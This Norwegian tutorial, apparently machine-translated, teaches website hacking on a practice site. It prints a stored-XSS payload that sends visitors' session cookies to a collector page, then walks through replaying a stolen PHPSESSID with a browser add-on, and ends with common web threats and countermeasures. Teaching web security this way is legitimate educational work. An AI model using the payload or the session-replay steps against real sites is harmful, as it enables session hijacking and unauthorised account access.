Hvordan hacke en nettside? Vanlige nettstedshackingsteknikker
--Oliver Jones
Teknikker for hacking av nettsteder
Flere mennesker har tilgang til internett enn noen gang før. Dette har fått mange organisasjoner til å utvikle nettbaserte applikasjoner som brukere kan bruke på nettet for å samhandle med organisasjonen. Dårlig skrevet kode for nettapplikasjoner kan utnyttes til å få uautorisert tilgang til sensitive data og webservere.
I denne opplæringen lærer du hvordan du hacker nettsider, og vi vil introdusere deg til hackingteknikker for nettapplikasjoner og mottiltak du kan sette på plass for å beskytte mot slike angrep.
Hvordan hacke et nettsted
I dette praktiske scenariet for hacking av nettsteder skal vi kapre brukerøkten til nettapplikasjonen som ligger på www.techpanda.org. Vi vil bruke skripting på tvers av nettsteder for å lese sesjons-ID-en for informasjonskapsler og deretter bruke den til å etterligne en legitim brukerøkt.
Forutsetningen er at angriperen har tilgang til webapplikasjonen og han ønsker å kapre øktene til andre brukere som bruker samme applikasjon. Målet med dette angrepet kan være å få administratortilgang til nettapplikasjonen forutsatt at angriperens tilgangskonto er begrenset.
Trinn 1) Åpne URL http://www.techpanda.org/.
For praksisformål anbefales det sterkt å få tilgang ved hjelp av SQL Injection. Viser til dette Artikkel for mer informasjon om hvordan du gjør det.
Trinn 2) Skriv inn påloggingsdetaljer.
E-postadressen for pålogging er admin@google.com, passordet er Password2010.
Trinn 3) Sjekk dashbordet.
Hvis du har logget på vellykket, får du opp følgende dashbord
Trinn 4) Skriv inn nytt innhold.
Klikk på Legg til ny kontakt og skriv inn følgende som fornavn
<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>
Trinn 5) Legg til Javascript.
Koden ovenfor bruker JavaScript. Den legger til en hyperkobling med en onclick-hendelse. Når den intetanende brukeren klikker på lenken, henter hendelsen PHP informasjonskapseløkt-ID og sender den til snatch_sess_id.php side sammen med økt-ID-en i URL-en
Trinn 6) Legg til detaljer.
Skriv inn de resterende detaljene som vist nedenfor og klikk på Lagre endringer
Trinn 7) Sjekk dashbordet.
Dashbordet ditt vil nå se ut som følgende skjermbilde
Trinn 8) Sjekk økt-ID.
Merknader: Skriptet kan sende verdien til en ekstern server hvor PHPSESSID er lagret, deretter ble brukeren omdirigert tilbake til nettstedet som om ingenting hadde skjedd.
Merknader: verdien du får kan være forskjellig fra den på denne nettsiden hacking opplæring, men konseptet er det samme
Sesjonsetterligning ved hjelp av Firefox og Tamper Data-tillegg
Flytskjemaet nedenfor viser trinnene du må ta for å fullføre denne øvelsen.
- Du vil trenge Firefox nettleser for denne delen og Tamper Data-tillegget
- Open Firefox og installer tillegget som vist i diagrammene nedenfor
- Søk etter sabotasjedata og klikk deretter på installer som vist ovenfor
- Klikk på Godta og installer...
- Klikk på Start på nytt nå når installasjonen er fullført
- Aktiver menylinjen i Firefox hvis den ikke vises
- Klikk på verktøymenyen og velg Tamper Data som vist nedenfor
- Du får opp følgende vindu. Merk: Hvis Windows er ikke tom, trykk på slett-knappen
- Klikk på Start sabotasje-menyen
- Bytt tilbake til Firefox nettleser, skriv http://www.techpanda.org/dashboard.php trykk deretter enter-tasten for å laste siden
- Du vil få følgende popup fra Tamper Data
- Popup-vinduet har tre (3) alternativer. Tamper-alternativet lar deg endre HTTP-hodeinformasjonen før den sendes til serveren.
- Klikk på den
- Du får opp følgende vindu
- Kopier PHP-sesjons-ID du kopierte fra angreps-URLen og limte den inn etter likhetstegnet. Verdien din skal nå se slik ut
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
- Klikk på OK-knappen
- Du får opp popup-vinduet Tamper data igjen
- Fjern merket i avmerkingsboksen som spør Fortsette manipulering?
- Klikk på send-knappen når du er ferdig
- Du skal kunne se dashbordet som vist nedenfor
Merknader: vi logget ikke på, vi etterlignet en påloggingsøkt ved å bruke PHPSESSID-verdien vi hentet ved bruk av cross site scripting
Hva er en webapplikasjon? Hva er nettrusler?
En nettapplikasjon (alias nettside) er en applikasjon basert på klient-server-modellen. De server gir databasetilgangen og forretningslogikken. Den ligger på en webserver. Klientapplikasjonen kjører på klientnettleseren. Nettapplikasjoner er vanligvis skrevet på språk som f.eks Java, C# og VB.Net, PHP, ColdFusion Markup Language osv. databasemotorene som brukes i webapplikasjoner inkluderer MySQL, MS SQL Server, PostgreSQL, SQLiteOsv
Topp hackingteknikker for nettsteder
De fleste nettapplikasjoner ligger på offentlige servere som er tilgjengelige via Internett. Dette gjør dem sårbare for angrep på grunn av lett tilgjengelighet. Følgende er vanlige nettapplikasjonstrusler.
- SQL Injection – Målet med denne trusselen kan være å omgå påloggingsalgoritmer, sabotere dataene osv.
- Nektelse av tjenesteangrep– Målet med denne trusselen kan være å nekte legitime brukere tilgang til ressursen
- Cross Site Scripting XSS– Målet med denne trusselen kan være å injisere kode som kan kjøres på nettleseren på klientsiden.
- Cookie/Session-forgiftning– Målet med denne trusselen er å endre informasjonskapsler/sesjonsdata av en angriper for å få uautorisert tilgang.
- Skjematukling – Målet med denne trusselen er å endre skjemadata som priser i e-handelsapplikasjoner slik at angriperen kan få varer til reduserte priser.
- Kodeinjeksjon – Målet med denne trusselen er å injisere kode som PHP, Python, etc. som kan kjøres på serveren. Koden kan installere bakdører, avsløre sensitiv informasjon osv.
- defacement– Målet med denne trusselen er å endre siden som ble vist på et nettsted og omdirigere alle sideforespørsler til én enkelt side som inneholder angriperens melding.
Hvordan beskytte nettstedet ditt mot hacks?
En organisasjon kan ta i bruk følgende policy for å beskytte seg mot nettserverangrep.
- SQL Injection – sanering og validering av brukerparametere før de sendes til databasen for behandling kan bidra til å redusere sjansene for å bli angrepet via SQL Injection. Databasemotorer som MS SQL Server, MySQL, etc. støtteparametere, og utarbeidede uttalelser. De er mye tryggere enn tradisjonelle SQL-setninger
- Denial of Service-angrep – brannmurer kan brukes til å slippe trafikk fra mistenkelig IP-adresse hvis angrepet er en enkel DoS. Riktig konfigurasjon av nettverk og inntrengningsdeteksjonssystem kan også bidra til å redusere sjansene for en DoS angrep vært vellykket.
- Cross Site Scripting – validering og desinfisering av overskrifter, parametere som sendes via URL-en, skjemaparametere og skjulte verdier kan bidra til å redusere XSS-angrep.
- Cookie/Session-forgiftning – dette kan forhindres ved å kryptere innholdet i informasjonskapslene, tidsavbryte informasjonskapslene etter en stund, assosiere informasjonskapslene med klientens IP-adresse som ble brukt til å lage dem.
- Formtempering – dette kan forhindres ved å validere og verifisere brukerinngangen før den behandles.
- Kodeinjeksjon – dette kan forhindres ved å behandle alle parametere som data i stedet for kjørbar kode. Sanitisering og validering kan brukes til å implementere dette.
- Defacement – en god sikkerhetspolicy for webapplikasjonsutvikling bør sikre at den forsegler ofte brukte sårbarheter for å få tilgang til webserveren. Dette kan være en riktig konfigurasjon av operativsystemet, webserverprogramvare og beste sikkerhetspraksis ved utvikling av webapplikasjoner.
Sammendrag
- En nettapplikasjon er basert på server-klient-modellen. Klientsiden bruker nettleseren for å få tilgang til ressursene på serveren.
- Nettapplikasjoner er vanligvis tilgjengelige over internett. Dette gjør dem sårbare for angrep.
- Nettapplikasjonstrusler inkluderer SQL Injection, Code Injection, XSS, Defacement, Cookie-forgiftning, etc.
- En god sikkerhetspolicy når du utvikler nettapplikasjoner kan bidra til å gjøre dem sikre.
